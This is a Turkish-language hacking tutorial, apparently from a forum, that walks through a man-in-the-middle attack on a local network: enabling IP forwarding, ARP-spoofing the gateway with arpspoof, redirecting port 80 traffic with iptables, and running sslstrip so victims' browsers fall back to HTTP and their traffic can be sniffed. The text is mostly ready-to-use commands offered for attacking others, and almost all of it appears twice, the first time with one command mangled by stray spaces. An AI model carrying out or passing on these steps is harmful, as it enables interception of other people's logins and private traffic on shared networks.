Kullanıcı ve sunucu koklama başarıyla nasıl sonuçlanır, öncelikle bu güvenli bağlantıyı kırmak istiyorum güvenli soket ve güvensiz soket arasında kurulan güvenli ve şifrelenmiş bağlantı için kullanılan güvenli yuva katmanı veya SSL dediğimiz (secure socket layer) nasıl kırılıacak çok basit anlatmaya çalışacağım anlattıklarımdan sonrasında herşey zekanıza kalıyor.
Ben orta ölçekli bir saldırı başlatmak istiyorum, bu yüzden bunun için bazı araçlara ihtiyaç duyuyorum ve ihtiyaç listesi SSL koruması kırmak için liste aşağıda
1. Linux OS
2. ARPSpoof
3. IPTables
4. SSLStrip
5. NetStat
6.Route
Şimdi, her şeyden önce oyunu başlatmak için port yönlendirme kullanacağım bu komutu başlatmak için Linux kulanacağız terminal komutları aşağıda devam.
echo '1'> / proc / sys / net / ipv4 / ip_forward
Bu komut dizini Linux'ta bir dizi, ağ geçidi komutlarının kullanımı hakkında bilgi sahibi olmanız gerektiğini hatırlattımı gençler, ağ geçidi IP hakkında tüm paketleri iletebilmesi için bilmeniz gereken komut dizini başlangıcındayız çok ihtiyacınız olacak peki devam edelim
1.netstat nr
1.route [varsayılan ağ geçidi için bakmamız gereken yer]
Her zaman bilgi için konu altına yazabilirsiniz örneğin [command] eg man route nedir gibi
Şimdi saldırıyı gerçekleştirmek için ARPSpoof kullanacaz
arpspoof -i [interface] [default gateway] eg arpspoof -i eth0 192.168.200.254
SSL indirelim kullanmayı ve kurulumunu bilmediğiniz bişeyi asla hackleyemezsiniz demicem ama eskiden bunu bilmiyorsanız hack yapamazdınız çünkü ortalıkta bu kadar saçma dork ve bu kadar çok lamer dolaşmıyordu. SSL kullanan, resmi web sitesinden bağlantı noktası 8080 veya bağlantı noktası 80 gelen tüm trafiği yönlendirmek için kullanacağımız kod tabiki ARPSspoof ile:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Bundan sonra ARPSpoof tablolarını okumak için tüm trafiği zehirlemek kalıyor nasıl mı?
echo '1' > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 192.168.200.254
Başarılı bir saldırı oldugunu varsayarak ARPSpoof yakalama başarılı ise trafik yönlendirmemiz her şey gayet iyi ve zamanında oluyor demektir aşağıdaki komutu kullanabiliriz buda SSL kullanmak anlamına gelir
sslstrip -l 8080
Tarayıcınızın adres çubuğu https kullanmaz artık. Bundan sonra sadece http kullanır ve koklama çok kolay bir hal almıştır.
Yukarıda belirtmiş ıolduğum programların komutlarını anlamak ve daha etkin kulanmak için yapmanız gerekenide yazayım boşa aşağıyı doldurmayın değil mi?
--help -h
Ayrıca google sayesindede biçok komutla alakalı açıklayıcı kanağa ulaşabilirsiniz bu günlük bu kadar ilham veren kardeşlerime buradan teşekkür ediyorum. (onlar kendilerini nbiliyor)
TS - Mugair
Alintidir.
Ben orta ölçekli bir saldırı başlatmak istiyorum, bu yüzden bunun için bazı araçlara ihtiyaç duyuyorum ve ihtiyaç listesi SSL koruması kırmak için liste aşağıda
1. Linux OS
2. ARPSpoof
3. IPTables
4. SSLStrip
5. NetStat
6.Route
Şimdi, her şeyden önce oyunu başlatmak için port yönlendirme kullanacağım bu komutu başlatmak için Linux kulanacağız terminal komutları aşağıda devam.
echo '1'> / proc / sys / net / ipv4 / ip_forward
Bu komut dizini Linux'ta bir dizi, ağ geçidi komutlarının kullanımı hakkında bilgi sahibi olmanız gerektiğini hatırlattımı gençler, ağ geçidi IP hakkında tüm paketleri iletebilmesi için bilmeniz gereken komut dizini başlangıcındayız çok ihtiyacınız olacak peki devam edelim
1.netstat nr
1.route [varsayılan ağ geçidi için bakmamız gereken yer]
Her zaman bilgi için konu altına yazabilirsiniz örneğin [command] eg man route nedir gibi
Şimdi saldırıyı gerçekleştirmek için ARPSpoof kullanacaz
arpspoof -i [interface] [default gateway] eg arpspoof -i eth0 192.168.200.254
SSL indirelim kullanmayı ve kurulumunu bilmediğiniz bişeyi asla hackleyemezsiniz demicem ama eskiden bunu bilmiyorsanız hack yapamazdınız çünkü ortalıkta bu kadar saçma dork ve bu kadar çok lamer dolaşmıyordu. SSL kullanan, resmi web sitesinden bağlantı noktası 8080 veya bağlantı noktası 80 gelen tüm trafiği yönlendirmek için kullanacağımız kod tabiki ARPSspoof ile:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Bundan sonra ARPSpoof tablolarını okumak için tüm trafiği zehirlemek kalıyor nasıl mı?
echo '1' > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 192.168.200.254
Başarılı bir saldırı oldugunu varsayarak ARPSpoof yakalama başarılı ise trafik yönlendirmemiz her şey gayet iyi ve zamanında oluyor demektir aşağıdaki komutu kullanabiliriz buda SSL kullanmak anlamına gelir
sslstrip -l 8080
Tarayıcınızın adres çubuğu https kullanmaz artık. Bundan sonra sadece http kullanır ve koklama çok kolay bir hal almıştır.
Yukarıda belirtmiş ıolduğum programların komutlarını anlamak ve daha etkin kulanmak için yapmanız gerekenide yazayım boşa aşağıyı doldurmayın değil mi?
--help -h
Ayrıca google sayesindede biçok komutla alakalı açıklayıcı kanağa ulaşabilirsiniz bu günlük bu kadar ilham veren kardeşlerime buradan teşekkür ediyorum. (onlar kendilerini nbiliyor)
TS - Mugair
Alintidir.